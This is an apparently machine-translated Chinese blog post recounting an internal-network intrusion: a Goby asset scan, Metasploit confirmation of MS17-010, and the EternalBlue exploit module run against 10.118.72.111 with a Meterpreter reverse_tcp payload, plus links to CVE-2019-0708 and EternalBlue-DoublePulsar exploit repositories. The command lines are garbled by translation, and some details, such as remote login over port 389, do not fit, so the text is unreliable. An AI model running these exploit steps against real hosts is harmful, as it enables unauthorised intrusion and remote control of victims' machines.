0x00 前言
最近疫情严重,上班时间都耽误了。在家学习的时候发现了goby,用来监控网络IT资产。
昨天,我可以试用它并扫描内部网资产。
地址0708 https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows.
0x01 Goby简介
分析目标网络的IT资产的规则来构建知识库,可以在安全事件发生的最短时间内管理安全突发事件。与传统的端口扫描和漏洞扫描不同,Goby只处理小范围受影响区域的漏洞突发事件,因此这种方式速度最快,对目标网络的影响最小。
在官网下载https://gobies.org/安装试用版
设置扫描任务
期间发现某主机可能有永恒蓝,就打了。
0x02 msf–ms17-010扫描确认
攻击机卡利linux
目标10
工具metasploit
Nmap扫描目标端口,并确认端口445是开放的。
MSF console # enter MSF MSF >:Search ms17-010 #查看相关模块MSF >:use auxiliary/scanner/SMB/SMB _ ms17 _ 010 MSF auxiliary(scanner/SMB/SMB _ ms17 _ 010)>set rhosts 10.118.72.111msf辅助(scanner/smb/smb_ms17_010)>利用
确认易受攻击!
说明主机10.118.72.111存在MS17-010漏洞。
漏洞攻击
使用下面的攻击模块
msf & gt使用exploit/windows/SMB/ms17 _ 010 _ eternal blue MSF exploit(windows/SMB/ms17 _ 010 _ eternal blue)>set rhost 10.118.72.111rhost = >10.118.72.111msf漏洞利用(windows/SMB/ms17 _ 010 _ eternal blue)>set lhost xxxlhost = & gtxxxmsf漏洞利用(windows/SMB/ms17 _ 010 _ eternal blue)>设置有效负载windows/x64/meter preter/reverse _ tcppayload = & gt;windows/x64/meter preter/reverse _ tcpmsf exploit(windows/SMB/ms17 _ 010 _ eternal blue)>
但是…。。没用。
我在后面找到了https://laucyun.com/a6cb3c752b0fc10f0a9eeef01f7a5f76.html的参考文献。
x86平台下失败的解决方法
Msf自带的utilization模块只针对x64版本的操作系统,对于x86版本的操作系统无效。可以使用https://git . lau cyun . com/security/eternal blue-double pulsar-metasploit . git解决。
最终的配置是
吴氏还修改了一套当时注射lsass.exe的流程。
我们胜利了。
端口389是打开的
远程登录成功!
其他资料
Ms17010这个问题其实挺难的。看到好的信息,先收集起来,以便后期攻防使用。
https://mp.weixin.qq.com/s/EoHB02qOscZsj3cNS40Rsw
由于缺乏内网渗透的经验,我们还在摸索中。可以对下一步的渗透提出建议!
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。
作者:美站资讯,如若转载,请注明出处:https://www.meizw.com/n/304692.html